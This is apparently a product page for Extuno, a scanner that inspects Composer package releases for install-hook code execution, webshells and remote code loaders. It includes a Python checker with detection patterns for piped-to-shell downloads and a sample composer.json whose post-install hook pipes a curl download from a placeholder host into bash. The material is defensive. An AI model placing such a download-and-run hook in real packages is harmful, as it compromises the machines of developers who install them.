Package registry: Composer

Composer packages, checked on every release.

A poisoned Composer release can run code from a composer.json install hook, before any class is required. Extuno diffs each version and reads the PHP for install-script RCE, backdoors, and webshells - with static and AI analysis on every scan.

[Live inspection demo: monolog/monolog 3.9 -> 3.10, composer package; static, dynamic, and AI analysis of the update]
What Extuno catches in Composer

Evidence, not guesswork.

Each finding names the change, why it is dangerous, and the recommended action.

Diff finding: Install-script RCE (Critical)

A composer.json post-install hook runs curl|bash on `composer install`.

Diff finding: Injected webshell (Critical)

A file gains eval() over request data - a remote-controlled shell.

Diff finding: Remote code loader (Review)

The package fetches a URL and eval()s the response.
See it on a poisoned update

Install-time PHP, caught before composer runs it

Extuno reads the composer.json hooks and the PHP, and flags the download-and-run install command.

  • Vulnerability and secret-leak testing on every version
  • Static analysis reads the package without running it
  • Dynamic sandbox runs it live and records behavior
  • AI code analysis reads the full source and correlates the change against prior versions
[Dependency tree: your-app -> monolog/monolog 3.10, guzzlehttp/guzzle 7.9, symfony/console 7.1, acme/logger-helper 1.2.1; the acme/logger-helper post-install-cmd fetches from packagist-cdn.co]
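As an added illustration of the install-hook check described above (example code written for this page, not Extuno's scanner): a small Python checker that parses a composer.json, flattens its install-time script events, and flags commands that download and execute content. The event names are Composer's documented script events; the detection patterns, the contents of the sample acme/logger-helper manifest and its URL are constructed for the example.

```python
import json
import re

# Composer script events that fire automatically around install/update.
INSTALL_HOOKS = frozenset({
    "pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
    "pre-autoload-dump", "post-autoload-dump",
    "post-root-package-install", "post-create-project-cmd",
})

# Command shapes that fetch remote content and execute it (patterns are constructed here, not Extuno's).
DOWNLOAD_AND_RUN = (
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b"), "pipes a download into a shell"),
    (re.compile(r"\bbase64\b[^|;&]*(-d|--decode)[^|;&]*\|\s*(ba|z|da)?sh\b"), "decodes base64 into a shell"),
    (re.compile(r"\bphp\s+-r\b.*https?://"), "runs inline PHP that references a URL"),
)

def hook_commands(scripts: dict) -> list[tuple[str, str]]:
    """Flatten "scripts" into (event, command) pairs; Composer allows a string or a list per event."""
    pairs = []
    for event, cmds in scripts.items():
        if event in INSTALL_HOOKS:
            for cmd in ([cmds] if isinstance(cmds, str) else cmds):
                pairs.append((event, cmd))
    return pairs

def find_install_risks(composer_json: str) -> list[dict]:
    """One finding per install hook matching a download-and-run pattern, plus one if the
    package is a composer-plugin (plugin PHP runs inside the composer process at install)."""
    data = json.loads(composer_json)
    findings = []
    for event, cmd in hook_commands(data.get("scripts", {})):
        for pattern, reason in DOWNLOAD_AND_RUN:
            if pattern.search(cmd):
                findings.append({"hook": event, "command": cmd, "reason": reason})
                break  # one reason per command is enough for triage
    if data.get("type") == "composer-plugin":
        findings.append({"hook": "type", "command": "composer-plugin",
                         "reason": "package code runs inside composer at install time"})
    return findings

# Constructed manifest modelled on the poisoned helper shown on the page
# (package name from the page; the URL is a placeholder, not a real host).
SAMPLE_COMPOSER_JSON = r"""{"name": "acme/logger-helper",
  "scripts": {"post-install-cmd": ["Acme\\Installer::postInstall",
              "curl -fsSL https://cdn.example.invalid/setup.sh | bash"],
              "test": "phpunit"}}"""
```

Composer executes only the root package's scripts, so for a dependency the equivalent install-time vector is a composer-plugin package, which the checker also flags. A match is a reason to read the script and the PHP it calls, not proof of compromise on its own.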

Scan your first Composer package free.

Your first 5 credits are free - that is 5 full scans, no card required.